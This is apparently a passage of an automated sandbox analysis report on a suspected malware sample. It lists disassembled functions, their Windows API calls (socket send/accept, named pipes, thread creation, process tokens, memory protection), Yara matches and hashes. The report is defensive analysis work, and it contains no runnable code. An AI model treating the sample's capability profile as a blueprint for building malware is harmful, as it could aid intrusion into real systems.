                                                                    • Part of subcall function 0099D0D8: VirtualProtect.KERNEL32 ref: 0099D168
                                                                    • Part of subcall function 009AACF8: free.LIBCMT ref: 009AAD94
                                                                    • Part of subcall function 009AACF8: free.LIBCMT ref: 009AADA5
                                                                  • Sleep.KERNEL32 ref: 009AA367
                                                                  • ExitThread.KERNEL32 ref: 009AA371
                                                                  • CreateThread.KERNEL32 ref: 009AA396
                                                                  • ExitProcess.KERNEL32 ref: 009AA3B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitThreadfree$CreateProcessProtectSleepVirtual
                                                                  • String ID:
                                                                  • API String ID: 334832864-0
                                                                  • Opcode ID: b0c9434338f191774dad3a3bc8873c414334a7dcf96e742dbcc85d9feb61dd03
                                                                  • Instruction ID: c733d3f9594de9182c7c34d06d779acdbad8a5139455d5d25431c6a00f02c761
                                                                  • Opcode Fuzzy Hash: b0c9434338f191774dad3a3bc8873c414334a7dcf96e742dbcc85d9feb61dd03
                                                                  • Instruction Fuzzy Hash: CE01AD31A0464483FF6CAB29F59637E326EFBC5734F108A2AE65A066E5CF3DC4408345
                                                                  Function 009AB054 Relevance: 6.0, APIs: 4, Instructions: 39networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • accept.WS2_32 ref: 009AB069
                                                                  • send.WS2_32 ref: 009AB0A7
                                                                  • send.WS2_32 ref: 009AB0BB
                                                                  • closesocket.WS2_32 ref: 009AB0CC
                                                                    • Part of subcall function 009AB190: closesocket.WS2_32 ref: 009AB19C
                                                                    • Part of subcall function 009AB190: free.LIBCMT ref: 009AB1A6
                                                                    • Part of subcall function 009AB190: free.LIBCMT ref: 009AB1AF
                                                                    • Part of subcall function 009AB190: free.LIBCMT ref: 009AB1B8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$closesocketsend$accept
                                                                  • String ID:
                                                                  • API String ID: 47150829-0
                                                                  • Opcode ID: 2302a165cdef7cc09ef642e4ce3548a0388fbd4d973569beb06914d3a6b68fc5
                                                                  • Instruction ID: 83bae7427c417071773d9cbab07ac79401d3a9a94fd6ca98d943ed0641546432
                                                                  • Opcode Fuzzy Hash: 2302a165cdef7cc09ef642e4ce3548a0388fbd4d973569beb06914d3a6b68fc5
                                                                  • Instruction Fuzzy Hash: 68018F2530459481DB249F76FA9577A3321F78AFF8F045611EE6607B8ADF28C4408B80
                                                                  Function 009A3B18 Relevance: 6.0, APIs: 4, Instructions: 34sleeppipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$NamedPeekPipeSleep
                                                                  • String ID:
                                                                  • API String ID: 1593283408-0
                                                                  • Opcode ID: 24ed3f8e0f689e66d14563056fce9734228b0b7ac3161939a24db8e0b7bcfd6a
                                                                  • Instruction ID: 4ca79ac41bb839cf8a1ec7e8cdd041bec7db3ff711f70340a90cefb2afb324f8
                                                                  • Opcode Fuzzy Hash: 24ed3f8e0f689e66d14563056fce9734228b0b7ac3161939a24db8e0b7bcfd6a
                                                                  • Instruction Fuzzy Hash: 35F0C831618B5086F7108B25F84432AB3AEE7C5B94F688534E74943A65DF3CC5818B54
                                                                  Function 009A31D0 Relevance: 6.0, APIs: 4, Instructions: 32sleeppipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$NamedPeekPipeSleep
                                                                  • String ID:
                                                                  • API String ID: 1593283408-0
                                                                  • Opcode ID: 2a447a1a196fe585755e7802e0ac48e0573567d8f0a00b20491c8c660c2fcfe5
                                                                  • Instruction ID: 60c02c3cbc1ccc96a152e7bdcaaacf4473ede0c9db198d2d62feeaf753de9ceb
                                                                  • Opcode Fuzzy Hash: 2a447a1a196fe585755e7802e0ac48e0573567d8f0a00b20491c8c660c2fcfe5
                                                                  • Instruction Fuzzy Hash: 39F0C832618A9186F7148B15F84431AB77DF7C5BE4F648520EB9542E35DF3CC591CB44
                                                                  Function 009A5D58 Relevance: 6.0, APIs: 4, Instructions: 32memorythreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InitializeProcThreadAttributeList.KERNEL32 ref: 009A5D76
                                                                  • GetProcessHeap.KERNEL32 ref: 009A5D7C
                                                                  • HeapAlloc.KERNEL32 ref: 009A5D8C
                                                                  • InitializeProcThreadAttributeList.KERNEL32 ref: 009A5DA7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1212816094-0
                                                                  • Opcode ID: 62263623e8ff9a03dfdac281dd069e3106b55080811b78c7820858d5affca705
                                                                  • Instruction ID: fafb107f3d1faf9702b8bad0f09347b758d323b42110f1266a015bd6a72ac8ba
                                                                  • Opcode Fuzzy Hash: 62263623e8ff9a03dfdac281dd069e3106b55080811b78c7820858d5affca705
                                                                  • Instruction Fuzzy Hash: A9F0BB22725A4083EB44CB75F4187DA72A5EB8DBA0F595439FA0B47759DF3CC484C600
                                                                  Function 009AB190 Relevance: 6.0, APIs: 4, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • closesocket.WS2_32 ref: 009AB19C
                                                                  • free.LIBCMT ref: 009AB1A6
                                                                    • Part of subcall function 009AB1E8: HeapFree.KERNEL32 ref: 009AB1FE
                                                                    • Part of subcall function 009AB1E8: _errno.LIBCMT ref: 009AB208
                                                                    • Part of subcall function 009AB1E8: GetLastError.KERNEL32 ref: 009AB210
                                                                  • free.LIBCMT ref: 009AB1AF
                                                                  • free.LIBCMT ref: 009AB1B8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$ErrorFreeHeapLast_errnoclosesocket
                                                                  • String ID:
                                                                  • API String ID: 1525665891-0
                                                                  • Opcode ID: 313ab394c69fba967237909609d084426ad4e213068f2606add6450c422dc6b8
                                                                  • Instruction ID: d0d2d618ef3500370beb291518cfd79d1e33c41cf6056b643f3ec3eea2bc5e94
                                                                  • Opcode Fuzzy Hash: 313ab394c69fba967237909609d084426ad4e213068f2606add6450c422dc6b8
                                                                  • Instruction Fuzzy Hash: A0D0671261840581DB14AB72D8B223C2720E7DAF9CF540421EE1E9B266DF28C955D380
                                                                  Function 00401FD0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • Unknown pseudo relocation bit size %d., xrefs: 00402294
                                                                  • Unknown pseudo relocation protocol version %d., xrefs: 004022A8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                  • API String ID: 0-395989641
                                                                  • Opcode ID: 8caf0c066df89f6cee4c07a50155e792156557ee52966e310dcb16b3cca200fb
                                                                  • Instruction ID: 42e0c3400c77c9dd47adb4fdb8995eb2357067ceb312bbd9be83e7c2f840df7f
                                                                  • Opcode Fuzzy Hash: 8caf0c066df89f6cee4c07a50155e792156557ee52966e310dcb16b3cca200fb
                                                                  • Instruction Fuzzy Hash: 6A712272B10B9486DF10CF61DA0875A7761FB58BA8F58862ADF08377E8DB7DC540CA08
                                                                  Function 0355922B Relevance: 5.4, APIs: 4, Instructions: 378COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: malloc$_errno_getptdfree
                                                                  • String ID:
                                                                  • API String ID: 3172138858-0
                                                                  • Opcode ID: 33df26be159aca12d7d0b71fc111742376d265778d5d8216e679c52589a3f316
                                                                  • Instruction ID: ba72330bce6dc830a69f93c95034e47cb5cb990e292f2e89cccb529711697556
                                                                  • Opcode Fuzzy Hash: 33df26be159aca12d7d0b71fc111742376d265778d5d8216e679c52589a3f316
                                                                  • Instruction Fuzzy Hash: DEB1AF70528B49CFE769EB28E861A7833E1F789311764456FE84AC7270D77CA8438B81
                                                                  Function 00401DC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • Address %p has no image-section, xrefs: 00401DC0, 00401FA5
                                                                  • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: QueryVirtual
                                                                  • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                  • API String ID: 1804819252-157664173
                                                                  • Opcode ID: 24b42db9420a0036ba5551ca2cf6389df1f73159e8ba1386f4a30517d06c5471
                                                                  • Instruction ID: 52aafb0f448170306d42bca5540912cc2139dda9d14def77d71a33c16101a6f6
                                                                  • Opcode Fuzzy Hash: 24b42db9420a0036ba5551ca2cf6389df1f73159e8ba1386f4a30517d06c5471
                                                                  • Instruction Fuzzy Hash: 4B31E3B3702A4195EF118F12EA4175A3761BB95BA4F49413AEF4C273A1EF3CD486C788
                                                                  Function 0355AC47 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 0355AC98
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0355ACA3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID: B
                                                                  • API String ID: 1812809483-1255198513
                                                                  • Opcode ID: d81cd18daed7324077352a26b73286590cea42c1c2305b4db55e814308682461
                                                                  • Instruction ID: 0dffaed50f7c7e218bae390664ea33028f3d8dea2833db06779721a0d13562ee
                                                                  • Opcode Fuzzy Hash: d81cd18daed7324077352a26b73286590cea42c1c2305b4db55e814308682461
                                                                  • Instruction Fuzzy Hash: CC11C130228B088FC744EF1CE485765B3E1FB98324F1047AEB419C72A0CB74D940CB82
                                                                  Function 00401C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  • Unknown error, xrefs: 00401D2C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-3474627141
                                                                  • Opcode ID: d6c75893a8b8cdba1cdccd7648c7c79805f69453ca37c984926281bf3413687d
                                                                  • Instruction ID: 8762e6e2ae6541d4c7c6524eaf70c560080aac858bcbb5099d5ba83032827fc6
                                                                  • Opcode Fuzzy Hash: d6c75893a8b8cdba1cdccd7648c7c79805f69453ca37c984926281bf3413687d
                                                                  • Instruction Fuzzy Hash: 1E016163D18F88C2D6018F18E8003AB7331FB6E749F259316EB8C3A565DB79D592C704
                                                                  Function 00401CE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • Argument domain error (DOMAIN), xrefs: 00401CE0
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-2713391170
                                                                  • Opcode ID: 1d2f049123975630175d9b48e20279646fed079e7b419bc05d7036498ca68734
                                                                  • Instruction ID: 8c7bf1553abe8d1c1cf5b10b417118f64097995adaaa4f0d994d3f7e231e07fb
                                                                  • Opcode Fuzzy Hash: 1d2f049123975630175d9b48e20279646fed079e7b419bc05d7036498ca68734
                                                                  • Instruction Fuzzy Hash: ECF06D62858E8882D2029F1CE4003AB7331FB9EB88F28531AEF8D3A155DB28D5828704
                                                                  Function 00401CF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  • Partial loss of significance (PLOSS), xrefs: 00401CF0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-4283191376
                                                                  • Opcode ID: 7751c0dc0e5f4d0d5a77e2b05341f0464b5ada29b978619af56a2b80f2ae8e47
                                                                  • Instruction ID: 5cd091db9141fe0e6e89e9efff11c316d26cc63b3b889972c32c6c159b948a40
                                                                  • Opcode Fuzzy Hash: 7751c0dc0e5f4d0d5a77e2b05341f0464b5ada29b978619af56a2b80f2ae8e47
                                                                  • Instruction Fuzzy Hash: C4F06262858E8882D2029F1CE4003AB7331FB5E788F245316EF8D3A555DB28D5828704
                                                                  Function 00401D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  • Overflow range error (OVERFLOW), xrefs: 00401D00
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-4064033741
                                                                  • Opcode ID: 2da7071e0933fc8cd59be707335068b51f9eec2d662f944c6a91e8b8bb5ba5d0
                                                                  • Instruction ID: c612fb770c622c5d72669c3638e63aa4b2f428d8e56e9d424d6433c91b575293
                                                                  • Opcode Fuzzy Hash: 2da7071e0933fc8cd59be707335068b51f9eec2d662f944c6a91e8b8bb5ba5d0
                                                                  • Instruction Fuzzy Hash: 6FF01D62958E8882D2029F1DE4003AB7331FB9EB99F68531AEF8D3A555DB29D5828704
                                                                  Function 00401D10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  • The result is too small to be represented (UNDERFLOW), xrefs: 00401D10
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-2187435201
                                                                  • Opcode ID: 20ed77b3cd1f5ce30684c910d9c1ef4ed1bc2c10df881c0e026ae3cc509b1426
                                                                  • Instruction ID: abe9318e7ccd880ee09ac2f980ce11207d3172f5f88a25f0641f3127fee3ffee
                                                                  • Opcode Fuzzy Hash: 20ed77b3cd1f5ce30684c910d9c1ef4ed1bc2c10df881c0e026ae3cc509b1426
                                                                  • Instruction Fuzzy Hash: 77F06D62858E8882D2029F1DE4003AB7331FB9EB88F28531AEF8D3A155DB28D5828704
                                                                  Function 00401D20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  • Total loss of significance (TLOSS), xrefs: 00401D20
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-4273532761
                                                                  • Opcode ID: 2868899dc0ce06e4a194e0e488d1f1fc1f92f94880d84b2dd2216e23dea375c1
                                                                  • Instruction ID: 7a53e470b351231260d633d6082b1e766a8645853782131be27a1b39d9499402
                                                                  • Opcode Fuzzy Hash: 2868899dc0ce06e4a194e0e488d1f1fc1f92f94880d84b2dd2216e23dea375c1
                                                                  • Instruction Fuzzy Hash: 52F01262958E8882D2029F1DE4003AB7331FB9E799F245316EF8D3A555DB39D5828704
                                                                  Function 00401C78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                                                  • Argument singularity (SIGN), xrefs: 00401C78
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-2468659920
                                                                  • Opcode ID: bfa7157af2bfae74903953b95ccb901f8d552bd3022b870c14073aba30280489
                                                                  • Instruction ID: b6e0ecebc6e2091bb6bcdfd9ecb9f8b620cfa756c99f7cd1274eda0ebaf44184
                                                                  • Opcode Fuzzy Hash: bfa7157af2bfae74903953b95ccb901f8d552bd3022b870c14073aba30280489
                                                                  • Instruction Fuzzy Hash: CBF03062954F8882D202DF2DE4003AB7331FB5EB9DF649316EF8D3A555DB29D5828704
                                                                  Function 009A7730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OpenProcessToken.ADVAPI32 ref: 009A774A
                                                                    • Part of subcall function 009AAA24: GetTokenInformation.ADVAPI32 ref: 009AAAB9
                                                                  • CloseHandle.KERNEL32 ref: 009A776B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
